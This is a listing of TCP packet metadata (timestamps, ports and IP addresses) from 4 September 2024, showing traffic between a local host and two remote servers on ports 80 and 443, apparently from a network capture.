Sep 4, 2024 17:37:10.685223103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685230970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685241938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685250998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685257912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685261011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685267925 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685276031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685281992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685307980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685343027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685353041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685385942 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685482025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685512066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685610056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685621023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685628891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685638905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685652018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685674906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685745001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685756922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685777903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685797930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685925007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685935020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685944080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685954094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685957909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685965061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685967922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685976982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685992002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685996056 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686002016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686012983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686014891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686036110 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686048985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686049938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686062098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686075926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686093092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686222076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686233044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686240911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686250925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686258078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686260939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686264992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686283112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686295986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686376095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686383963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686417103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686528921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686538935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.686559916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.686583042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.687104940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687114000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687123060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687144995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.687158108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.687261105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687397957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687407970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687417030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687438011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.687457085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.687526941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687541008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687571049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.687670946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687680960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687716007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.687828064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687838078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687845945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.687865019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.687880993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689181089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689327002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689336061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689343929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689353943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689363003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689366102 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689373016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689382076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689409018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689626932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689639091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689647913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689656973 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689659119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689666986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689675093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689686060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689707994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689754963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689764977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689769983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689779043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689789057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689794064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689810038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689826965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689912081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689924002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689930916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689940929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.689949989 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689961910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.689979076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690103054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690114021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690121889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690131903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690140963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690144062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690152884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690162897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690165997 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690174103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690185070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690185070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690210104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690247059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690256119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690265894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690275908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690278053 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690285921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690304995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690304995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690439939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690449953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690458059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690468073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690478086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690478086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690490007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690519094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690598965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690911055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690923929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690932989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690942049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.690959930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690959930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.690979004 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.702872038 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.702894926 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.702940941 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.702949047 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.702972889 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.702992916 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.703294992 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.703320026 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.703344107 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.703351021 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.703376055 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.703387022 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.703865051 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.703879118 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.703922987 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.703928947 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.705657005 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.705679893 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.705707073 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.705713987 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.705724001 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.705743074 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.706337929 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.706355095 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.706382036 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.706387997 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.706397057 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.706417084 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.706804037 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.706818104 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.706855059 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.706861973 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.706883907 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.706901073 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.707164049 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.707179070 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.707216978 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.707222939 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.707247019 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.707254887 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.707700014 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.707714081 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.707751036 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.707758904 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.707782984 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.707792044 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.724318027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724328041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724337101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724347115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724356890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724365950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724375010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724384069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.724419117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.724448919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724461079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724469900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724479914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724492073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.724499941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.724525928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.724652052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724663973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724672079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724683046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724692106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724699020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.724714041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.724729061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.724775076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724790096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724803925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.724824905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.724966049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724977016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.724987030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725001097 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725013018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725018024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725119114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725130081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725137949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725148916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725156069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725158930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725178003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725188017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725251913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725261927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725284100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725291967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725462914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725472927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725481987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725491047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725501060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725502014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725512981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725512981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725522995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725528002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725534916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725544930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725544930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725554943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725569010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725589037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725769997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725784063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725792885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725802898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725804090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725820065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725824118 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725843906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725860119 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.725913048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725922108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.725951910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726053953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726067066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726074934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726085901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726098061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726109028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726130009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726192951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726205111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726213932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726227045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726228952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726233959 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726241112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726250887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726252079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726260900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726260900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726272106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726279974 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726279974 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726295948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726310015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726667881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726679087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726686954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726697922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726703882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726706982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726723909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726751089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726835012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726845026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726852894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726862907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726871014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726871967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726882935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726890087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726891994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726911068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726924896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.726983070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.726996899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727006912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727015018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727025032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727041960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727304935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727315903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727324963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727349997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727369070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727452993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727468967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727478027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727488041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727497101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.727502108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.727509022 CEST	80	49719	147.45.44.104	192.168.2.6
